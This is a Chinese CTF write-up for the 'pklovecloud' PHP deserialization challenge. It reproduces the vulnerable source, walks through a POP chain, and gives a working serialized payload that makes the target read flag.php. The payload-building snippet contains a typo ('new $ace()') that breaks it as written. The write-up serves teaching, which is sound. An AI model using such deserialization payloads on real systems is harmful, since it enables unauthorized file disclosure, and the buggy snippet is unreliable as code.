php反序列化漏洞典型例题

1.靶场环境

ctfhub-技能树-pklovecloud

引用题目:

2021-第五空间智能安全大赛-Web-pklovecloud

2.过程

2.1源代码

启动靶场环境,访问靶场环境,显示源码:直接贴在下面:

php 复制代码
<?php  
include 'flag.php';
class pkshow 
{  
    function echo_name()     
    {          
        return "Pk very safe^.^";      
    }  
} 

class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new pkshow;
    }  
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}  

class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
        $file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}  

if (isset($_GET['pks']))  
{
    $logData = unserialize($_GET['pks']);
    echo $logData; 
} 
else 
{ 
    highlight_file(__file__); 
}
?>

2.2代码审计思路

进行一下代码审计,记录一下思路:

1.直接看主函数:

php 复制代码
if (isset($_GET['pks']))  
{
    $logData = unserialize($_GET['pks']);
    echo $logData; 
} 
else 
{ 
    highlight_file(__file__); 
}

要进入if语句中,就必须传入一个get参数pks,然后对pks参数进行反序列化,获得logData对象,并且输出这个logData对象。

2.echo在输出一个对象时,是去调用这个对象的__toString()方法,因此我们跟踪到logData的__toString()方法:我们发现声明的acp对象有__toString()方法:

php 复制代码
class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new pkshow;
    }  
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}  

3.这就说明在主函数中要echo一个logData对象,我们只需要让这个logData对象是acp类即可,因此我们构造pop链时首先创建一个acp对象。

4.我们观察到acp对象的__toString()方法中的if语句,要进入到这个if语句,就需要acp对象的cinder参数不为空,并且最终会return这个acp对象的cinder属性的echo_name()方法。

5.通过上面我们构造一个pop链:

acp->cinder->echo_name()

6.我们发现声明的pkshow和ace对象都有echo_name()方法,而很明显pkshow的echo_name()方法是写死的没有参数传入的,因此我们需要使用ace对象。所以根据上面的调用链,我们需要让acp对象的cinder参数为ace对象。

综合以上几点,我们需要构造pop链:

php 复制代码
$acp=new acp();
$ace=new $ace();
$acp->cinder=$ace;

7.通过以上pop链,已经可以调用到ace对象的echo_name()方法了,我们去看这个方法的执行逻辑:

php 复制代码
class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
        $file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}  

发现最终的结果是返回file指向文件的内容,因此我们设置file="flag.php",而我们要进入if循环,就需要满足this-\>openstack-\>neutron === this->openstack->nova,也就是ace对象的openstack参数的neutron属性和nova属性相等,我们发现acp对象有这两个属性,因此我们要让ace对象的openstack属性为acp对象:需要新建一个acp对象。

php 复制代码
$this->openstack = unserialize($this->docker);

根据这行代码我们判断openstack参数是由docker参数反序列化得到的,因此ace对象的docker参数就是acp对象。下一行代码:

php 复制代码
$this->openstack->neutron = $heat;

这行代码中heat参数并不存在,因此neutron的值为null,我们需要让nova参数的值也为null,因此我们在声明acp对象的时候,不需要给nova赋值,结合上述构造pop链:

php 复制代码
class acp 
{   
    public $cinder;  
    public $neutron;
    public $nova; 
}  
class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
}  
$acp=new acp();

$acp2=new acp();

$ace=new $ace();
$ace->filename="flag.php";
$ace->docker=serialize($acp2);

$acp->cinder=$ace;
echo serialize($acp);

这样最后输出的值就是我们构造的恶意参数:

得到pop链:

php 复制代码
O:3:"acp":3:{s:6:"cinder";O:3:"ace":3:{s:8:"filename";s:8:"flag.php";s:9:"openstack";N;s:6:"docker";s:58:"O:3:"acp":3:{s:6:"cinder";N;s:7:"neutron";N;s:4:"nova";N;}";}s:7:"neutron";N;s:4:"nova";N;}

访问index.php构造恶意参数pks,F12查看源码获得flag:

相关推荐
AI+程序员在路上28 分钟前
Qt6中模态与非模态对话框区别
开发语言·c++·qt
nbsaas-boot5 小时前
Java 正则表达式白皮书:语法详解、工程实践与常用表达式库
开发语言·python·mysql
chao_7895 小时前
二分查找篇——搜索旋转排序数组【LeetCode】两次二分查找
开发语言·数据结构·python·算法·leetcode
风无雨6 小时前
GO 启动 简单服务
开发语言·后端·golang
斯普信专业组6 小时前
Go语言包管理完全指南:从基础到最佳实践
开发语言·后端·golang
我是苏苏8 小时前
C#基础:Winform桌面开发中窗体之间的数据传递
开发语言·c#
小红卒8 小时前
upload-labs靶场通关详解:第21关 数组绕过
web安全·网络安全·文件上传漏洞
斐波娜娜8 小时前
Maven详解
java·开发语言·maven
小码氓8 小时前
Java填充Word模板
java·开发语言·spring·word
暮鹤筠9 小时前
[C语言初阶]操作符
c语言·开发语言